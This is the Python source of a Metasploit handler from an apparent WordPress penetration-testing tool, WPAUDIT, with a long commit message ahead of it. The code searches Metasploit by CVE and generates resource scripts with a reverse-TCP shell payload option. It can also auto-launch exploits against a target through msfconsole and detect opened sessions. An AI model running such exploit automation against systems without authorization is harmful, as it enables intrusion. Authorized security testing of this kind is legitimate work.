wpaudit/modules/exploit_intel/metasploit_handler.py
Huzaifa Shoukat 1c5a60dc34 feat: Major enhancements, system rename to WPAUDIT, and core improvements
This commit introduces a wide range of significant enhancements,
a system-wide rename, and core architectural improvements.

**1. System Renaming:**
   - Renamed the project from "OmegaScythe Dominator/Overlord" and "OSO" to "WPAUDIT" across all relevant files. This includes:
     - `README.md`: Updated project title, descriptions, and example file names.
     - `config/default_config.yaml`: Updated comments, `output_dir`, `report_prefix`, `default_user_agent`, and XSS fuzzing payload markers.
     - Python Modules (`main.py`, `core/utils.py`, `core/tool_runner.py`, `modules/wpscan_auditor.py`, `modules/nuclei_scanner.py`, `modules/exploit_intel/metasploit_handler.py`): Updated internal references, print statements, and default values to reflect "WPAUDIT".

**2. Extensive Module Enhancements:**
   - **wp_analyzer Suite:**
     - `sqli_checker.py`: Added sophisticated boolean-based and time-based blind SQLi detection capabilities.
     - `xss_checker.py`: Expanded XSS payloads and added heuristic URL fragment checking for potential DOM XSS vectors.
     - `admin_area_security.py`: Added checks for alternative admin paths, common admin protection plugin footprints, and .htaccess protection heuristics.
     - `advanced_user_enum.py`: Implemented oEmbed and more granular REST API user enumeration techniques.
     - `ajax_checker.py`: Added rudimentary HTML-based AJAX action discovery and a basic parameter fuzzing framework for discovered actions.
     - `config_audit.py`: Implemented heuristic checks for `WP_DEBUG` exposure, `DISALLOW_FILE_EDIT`, and `FORCE_SSL_ADMIN` status.
     - `login_page.py`: Added detection for CAPTCHA, 2FA plugin footprints, "Lost Password" & "Register" link analysis, and passive password policy hints.
     - `comment_security.py`: Added checks for comment author link `rel` attributes (nofollow, ugc, sponsored), comment moderation hints, and `wp-comments-post.php` protection.
     - `cron_checker.py`: Refined `wp-cron.php` accessibility checks, added `X-Robots-Tag` check, and informational notes on cron-related constants.
     - `debug_exposure.py`: Added checks for publicly accessible `debug.log` and Query Monitor plugin footprints.
     - `custom_endpoint_fuzzer.py`: Implemented deeper REST API endpoint discovery (listing routes within custom namespaces), consumption of AJAX actions from `ajax_checker.py`, basic unauthenticated probing, and a lightweight fuzzing capability (XSS, SQLi) for discovered custom endpoints.
     - `directory_listing.py`: Added recursive checking for `wp-content/uploads` (year/month), dynamic checking of discovered plugin/theme subdirectories, sensitive file type highlighting, and an expanded list of common directories.
     - `multisite_checker.py`: Improved multisite detection (HTML footprints like body classes, asset paths, `sunrise.php` presence) and deeper `wp-signup.php` analysis for user/site registration hints.
     - `rest_api.py` (formerly `analyze_rest_api_user_enum`): Renamed and refocused to `analyze_rest_api_general`. Now includes comprehensive listing of all REST API namespaces/routes, analysis of the API root for info disclosure, and unauthenticated checks on core endpoints (users, posts, pages, media, settings).
     - `security_headers.py`: Implemented detailed Content-Security-Policy (CSP) analysis (unsafe-inline/eval, broad sources, missing directives), deeper Strict-Transport-Security (HSTS) checks (max-age, includeSubDomains, preload), added checks for newer headers (COOP, COEP, CORP), and analysis of headers on `wp-login.php`.
     - `user_registration.py`: Added checks for CAPTCHA/anti-spam footprints, passive analysis for password strength meter indicators, heuristic checks for email verification requirements, and more detailed analysis of `wp-signup.php` in multisite contexts.
   - **Other Scanner Modules:**
     - `sqlmap_injector.py`: Added support for SQLMap tamper scripts via configuration and refined vulnerability detection from logs.
     - `nmap_scanner.py`: Enabled and refined Nmap XML parsing for better data extraction, added support for NSE script profiles, and included host script results in findings.
     - `parameter_finder.py`: Corrected `run_scan` logic for Arjun tool execution and standardized options handling.
   - **Exploit Intelligence (`exploit_intel/`):**
     - `query_builder.py`: Now leverages Nmap service information and more granular Nuclei data (tags, classification) to generate richer and more targeted exploit search queries.
     - `gatherer.py`: Handles structured query objects, includes basic query prioritization (CVEs first), stores results in a new `found_exploits_correlated` structure, and incorporates a confidence score for SearchSploit results based on query relevance.
     - `searchsploit_handler.py`: Improved JSON parsing from SearchSploit output, added extraction of "Date" and "Author" fields, and included placeholders for future exploit mirroring functionality.
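
The "CVEs first" prioritization mentioned for `gatherer.py` can be pictured with a minimal sketch. The query dictionaries, their `value` and `source` keys, the `prioritize_queries` helper, and the placeholder CVE identifiers are all assumptions made for illustration; none of them are taken from the actual module.

```python
import re

# Matches identifiers shaped like CVE-YYYY-NNNN (case-insensitive).
CVE_PATTERN = re.compile(r"^CVE-\d{4}-\d{4,}$", re.IGNORECASE)


def prioritize_queries(queries):
    """Return the queries with CVE identifiers first.

    sorted() is stable, so queries within each group keep their
    original relative order.
    """
    return sorted(queries, key=lambda q: 0 if CVE_PATTERN.match(q["value"]) else 1)


# Hypothetical structured queries; the CVE IDs are placeholders.
queries = [
    {"value": "wordpress 6.1", "source": "wpscan"},
    {"value": "CVE-2021-12345", "source": "nuclei"},
    {"value": "apache 2.4.49", "source": "nmap"},
    {"value": "cve-2020-0001", "source": "nuclei"},
]

ordered = prioritize_queries(queries)
print([q["value"] for q in ordered])
```

A stable sort keeps the sketch short: only the CVE/non-CVE distinction is ranked, and everything else stays in discovery order.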

**3. Core Function Improvements:**
   - **Reporting (`reporting/generator.py` & `report_template.html`):**
     - Implemented HTML report generation using Jinja2.
     - Created `reporting/report_template.html` for structured and user-friendly HTML reports.
     - Updated `main.py` to call the HTML report generation function.
   - **State Management (`core/state.py`):**
     - Integrated `orjson` for potentially faster JSON serialization/deserialization.
     - Implemented a backup mechanism (`.bak` file) before overwriting the state file during `save_state`.
     - Updated internal default paths/prefixes to align with the "WPAUDIT" renaming.
   - **Tool Checking (`core/tool_checker.py`):**
     - Implemented tool version checking against configurable minimum versions using the `packaging` library.
     - Added more specific regex patterns for version parsing for various tools.
     - Updated status reporting for tool checks to be more granular (e.g., "Found (Version OK)", "Found (Version Too Low)").
   - **Tool Runner (`core/tool_runner.py`):**
     - Improved error message for `subprocess.CalledProcessError` to include a snippet of `stderr` for better diagnostics.
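
The `.bak` backup step described for `save_state` could look roughly like the sketch below. It uses the standard-library `json` module instead of `orjson` so that it runs without extra dependencies, and the `save_state_with_backup` name, the file layout, and the sample state dictionaries are hypothetical rather than taken from `core/state.py`.

```python
import json
import os
import shutil
import tempfile


def save_state_with_backup(state, path):
    """Copy any existing state file to '<path>.bak', then write the new state."""
    if os.path.exists(path):
        # Preserve the previous state before it is overwritten.
        shutil.copy2(path, path + ".bak")
    with open(path, "w", encoding="utf-8") as f:
        json.dump(state, f, indent=2)


# Demonstration in a throwaway directory.
workdir = tempfile.mkdtemp()
state_path = os.path.join(workdir, "state.json")

save_state_with_backup({"phase": "recon"}, state_path)          # first save, no backup yet
save_state_with_backup({"phase": "exploit_intel"}, state_path)  # second save creates .bak

with open(state_path + ".bak", encoding="utf-8") as f:
    backup = json.load(f)
with open(state_path, encoding="utf-8") as f:
    current = json.load(f)

print(backup, current)
```

After the second call, the `.bak` file holds the state from the first call and the main file holds the latest state.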

**4. Configuration & Documentation:**
   - Updated `README.md` with the new "WPAUDIT" name, revised descriptions, and updated example file names.
   - Updated `config/default_config.yaml` with the "WPAUDIT" name, new report/output directory defaults, and new configuration options related to module enhancements (e.g., `exploit_intel_mirror_searchsploit_exploits`).
   - Implicitly added `Jinja2`, `orjson`, and `packaging` to `requirements.txt` dependencies.

This comprehensive suite of changes significantly advances WPAUDIT's capabilities, making it a more robust, intelligent, and user-friendly WordPress security auditing tool.
2025-05-20 00:51:10 +05:00


import re
import os
import subprocess
import time
from urllib.parse import urlparse
from core.tool_runner import run_command
from core.utils import get_scan_filename_prefix, user_confirm, sanitize_filename
# --- Constants ---
MSF_RC_DIR_NAME = "msf_resource_scripts" # Duplicated here for now, consider centralizing constants


def _generate_msf_rc_script(state, config, module_path, lhost, lport):
    """Generates a Metasploit resource (.rc) file for manual execution."""
    target_info = state.get_full_state()["scan_metadata"]["target_info"]
    rhost = target_info.get("ip", target_info.get("hostname"))
    target_url = target_info.get("url", "")
    # Determine RPORT based on URL scheme or default
    parsed_target_url = urlparse(target_url)
    rport = parsed_target_url.port or (443 if parsed_target_url.scheme == "https" else 80)
    ssl = "true" if parsed_target_url.scheme == "https" else "false"
    vhost = target_info.get("hostname", rhost)  # Use hostname for VHOST if available
    # Create dedicated directory for RC files
    base_filename = get_scan_filename_prefix(state, config)
    rc_dir = os.path.join(config["output_dir"], MSF_RC_DIR_NAME)
    os.makedirs(rc_dir, exist_ok=True)
    sanitized_module_name = sanitize_filename(module_path.replace("/", "_"))
    rc_filename = f"{os.path.basename(base_filename)}_msf_{sanitized_module_name}_lport{lport}.rc"
    rc_file_path = os.path.join(rc_dir, rc_filename)
    # The template lines stay at column 0 because they are written verbatim to the .rc file.
    rc_content = f"""# Metasploit Resource Script generated by WPAUDIT
# Module: {module_path}
# Target: {rhost}:{rport} (VHOST: {vhost})
# Listener: {lhost}:{lport}
# Generated: {time.strftime('%Y-%m-%d %H:%M:%S %Z')}
use {module_path}
set RHOSTS {rhost}
set RPORT {rport}
set LHOST {lhost}
set LPORT {lport}
set VERBOSE true
# --- Common Web Options (Uncomment/Adjust as needed) ---
# set SSL {ssl}
# set VHOST {vhost}
# set TARGETURI /path/to/vulnerable/app # Adjust if needed
# --- Payload Options (Example: Reverse TCP) ---
# set PAYLOAD generic/shell_reverse_tcp # Adjust payload if needed
# --- Check before running (Optional but Recommended) ---
# check
# --- Run the exploit ---
# exploit
# OR for auxiliary modules:
# run
# --- Instructions ---
# 1. Start msfconsole
# 2. Run: resource "{rc_file_path}" # Use quotes if path contains spaces
# 3. Review options with 'show options'
# 4. Adjust options if necessary (e.g., PAYLOAD, TARGETURI)
# 5. Run 'check' if available for the module
# 6. Run 'exploit' or 'run'
"""
    try:
        with open(rc_file_path, 'w') as f_rc:
            f_rc.write(rc_content)
        return rc_file_path
    except Exception as e:
        print(f" [-] Error generating MSF resource script '{rc_file_path}': {e}")
        return None


def _run_metasploit_module(state, config, module_path, lhost, lport, timeout):
    """
    Attempts to run a specific Metasploit module. VERY DANGEROUS.
    """
    target_info = state.get_full_state()["scan_metadata"]["target_info"]
    rhost = target_info.get("ip", target_info.get("hostname"))
    target_url = target_info.get("url", "")
    parsed_target_url = urlparse(target_url)
    rport = parsed_target_url.port or (443 if parsed_target_url.scheme == "https" else 80)
    sanitized_module_name = sanitize_filename(module_path.replace("/", "_"))
    base_filename = get_scan_filename_prefix(state, config)
    msf_log_dir = os.path.join(config["output_dir"], "msf_autorun_logs")
    os.makedirs(msf_log_dir, exist_ok=True)
    msf_run_log_file = os.path.join(msf_log_dir, f"{os.path.basename(base_filename)}_msf_run_{sanitized_module_name}_lport{lport}.log")
    # The command lines stay at column 0 because they are passed verbatim to msfconsole.
    msf_commands = f"""
use {module_path}
set RHOSTS {rhost}
set RPORT {rport}
set LHOST {lhost}
set LPORT {lport}
set VERBOSE true
exploit -z
exit
"""
    command = ["msfconsole", "-q", "-x", msf_commands]
    print(f" Executing MSF Autorun: {' '.join(command)}")
    log_content_header = f"Metasploit AUTORUN attempt for: {module_path}\nTarget: {rhost}:{rport}\nLHOST: {lhost}\nLPORT: {lport}\nCommand: {' '.join(command)}\n\n"
    run_status = "Failed"
    error_msg = None
    process = None  # Initialize process to None
    try:
        with open(msf_run_log_file, 'w', errors='ignore') as log_f:
            log_f.write(log_content_header)
            # text=True already enables text mode; universal_newlines is its older alias.
            process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True, bufsize=1, errors='ignore')
            # NOTE: this loop blocks until msfconsole closes stdout, so the timeout
            # passed to wait() below only covers the time after output has ended.
            for line in process.stdout:
                log_f.write(line)
            retcode = process.wait(timeout=timeout)
            if retcode != 0:
                error_msg = f"msfconsole exited with code {retcode}"
                run_status = f"Failed (RC={retcode})"
        if not run_status.startswith("Failed (RC="):  # Only check log if Popen didn't already indicate failure
            with open(msf_run_log_file, 'r', errors='ignore') as f_check:
                log_text_for_check = f_check.read().lower()
            if re.search(r"(session|command shell session|meterpreter session)\s+\d+\s+opened", log_text_for_check):
                print(f" [!!!] Metasploit AUTORUN for {module_path} appears SUCCESSFUL (Session Opened). Check log and listener!")
                run_status = "Success (Session Opened Indicator)"
                state.add_critical_alert(f"Metasploit: SUCCESSFUL AUTORUN of {module_path} against {rhost}. SESSION OPENED?")
            elif "exploit completed, but no session was created" in log_text_for_check:
                print(f" [-] Metasploit AUTORUN for {module_path} completed, but no session reported.")
                run_status = "Completed (No Session)"
            else:
                print(f" [?] Metasploit AUTORUN for {module_path} finished (RC=0). Review log for details: {msf_run_log_file}")
                run_status = "Completed (Unknown Outcome)"
        else:  # Popen failed (RC!=0)
            print(f" [-] Metasploit AUTORUN for {module_path} failed. RC={retcode}. Review log: {msf_run_log_file}")
    except subprocess.TimeoutExpired:
        error_msg = f"Autorun TIMED OUT after {timeout}s"
        print(f" [-] Metasploit AUTORUN timed out for {module_path}.")
        run_status = "Timeout"
        state.add_tool_error(f"Metasploit Autorun Timeout: {module_path} on {rhost}")
        if process and process.poll() is None:
            process.kill()
    except Exception as e:
        error_msg = f"Autorun ERROR: {e}"
        print(f" [-] Metasploit AUTORUN execution error for {module_path}: {e}")
        run_status = f"Error: {e}"
        state.add_tool_error(f"Metasploit Autorun Error: {module_path} on {rhost} - {e}")
    return {"module": module_path, "status": run_status, "log_file": msf_run_log_file, "error": error_msg}


def search_metasploit(state, config, query, base_scan_prefix_for_log, lhost_for_rc, current_lport_ref):
    """
    Searches Metasploit for a given query (typically a CVE), parses results,
    generates RC files, and optionally attempts autorun.

    current_lport_ref is a single-element list holding the next LPORT; it is
    incremented in place for each RC file generated, so it is not returned.

    Returns:
        list: Found Metasploit modules (dicts with path, rank, description).
        list: Records for generated RC files (query, module, rc_file, description).
        list: Results of autorun attempts.
    """
    print(f" Running Metasploit search for '{query}'...")
    found_msf_modules = []
    generated_rc_files_for_query = []
    autorun_attempts_for_query = []
    msfconsole_search_timeout = config.get("msfconsole_timeout", 90)
    msfconsole_exploit_timeout = config.get("msfconsole_exploit_timeout", 300)
    enable_autorun = config.get("exploit_intel_enable_autorun", False)
    allowed_autorun_modules = config.get("exploit_intel_autorun_modules", [])
    msf_search_console_log = os.path.join(
        config.get("output_dir", "."),
        "tool_logs",
        f"{os.path.basename(base_scan_prefix_for_log)}_msfsearch_{sanitize_filename(query)}.log"
    )
    os.makedirs(os.path.dirname(msf_search_console_log), exist_ok=True)
    try:
        cve_id_for_msf = query.upper().replace("CVE-", "")
        msf_cmd_str = f"search cve:{cve_id_for_msf}; exit"
        process_msf_obj = run_command(
            ["msfconsole", "-q", "-x", msf_cmd_str],
            "Metasploit Search", config,
            timeout=msfconsole_search_timeout,
            return_proc=True,
            log_file_path=msf_search_console_log
        )
        if process_msf_obj and hasattr(process_msf_obj, 'returncode') and process_msf_obj.returncode == 0:
            msf_output = ""
            if os.path.exists(msf_search_console_log):
                with open(msf_search_console_log, 'r', errors='ignore') as f_log_msf:
                    msf_output = f_log_msf.read()
            if not msf_output:
                print(f" [?] Metasploit search log for '{query}' is empty. Log: {msf_search_console_log}")
            # Captures module type, module name, rank, and description from each result row.
            module_regex = re.compile(r"^\s*\d*\s+(exploit|auxiliary)/(\S+)\s+\S+\s+(\w+)\s+.*?\s+(.*)$", re.MULTILINE)
            for match in module_regex.finditer(msf_output):
                module_type = match.group(1)
                module_name = match.group(2)
                module_path = f"{module_type}/{module_name}"
                module_rank = match.group(3)
                module_desc = match.group(4).strip()
                module_info = {"path": module_path, "rank": module_rank, "description": module_desc}
                found_msf_modules.append(module_info)
                rc_file_path = _generate_msf_rc_script(state, config, module_path, lhost_for_rc, current_lport_ref[0])
                if rc_file_path:
                    print(f" -> Generated MSF resource script: {rc_file_path}")
                    generated_rc_files_for_query.append({
                        "query": query, "module": module_path,
                        "rc_file": rc_file_path, "description": module_desc
                    })
                    current_lport_ref[0] += 1  # Increment LPORT by reference
                if enable_autorun and module_path in allowed_autorun_modules:
                    # Reuse the LPORT written to the RC file (already incremented above) if one was generated.
                    port_for_autorun = current_lport_ref[0] - 1 if rc_file_path else current_lport_ref[0]
                    if user_confirm(f"Attempt to AUTORUN Metasploit module '{module_path}' (LPORT: {port_for_autorun}) against target? EXTREMELY DANGEROUS.", config):
                        print(f" [*] Attempting autorun for module: {module_path} (LPORT: {port_for_autorun})")
                        autorun_result = _run_metasploit_module(state, config, module_path, lhost_for_rc, port_for_autorun, msfconsole_exploit_timeout)
                        autorun_attempts_for_query.append(autorun_result)
                        print(f" -> Autorun Status for {module_path}: {autorun_result.get('status')}. Log: {autorun_result.get('log_file')}")
                    else:
                        print(f" [i] Skipping autorun for {module_path} (User Declined).")
                        autorun_attempts_for_query.append({"module": module_path, "status": "Skipped (User Declined)", "log_file": None})
            if found_msf_modules:
                print(f" [+] Metasploit: Found {len(found_msf_modules)} potential module(s) for '{query}'.")
            elif "No results from search" not in msf_output and ("exploit/" in msf_output or "auxiliary/" in msf_output):
                print(f" [+] Metasploit: Output suggests modules for '{query}' (parsing might need refinement).")
                # Storing a snippet might be useful if parsing fails but output exists
                # found_exploits_dict[query]["metasploit_output_snippet"] = msf_output.split("Matching Modules")[-1][:500] if "Matching Modules" in msf_output else msf_output[:500]
    except Exception as e:
        print(f" [-] Metasploit: Error searching/running for '{query}': {e}")
        state.add_tool_error(f"Metasploit search/run Error for query '{query}': {e}")
    return found_msf_modules, generated_rc_files_for_query, autorun_attempts_for_query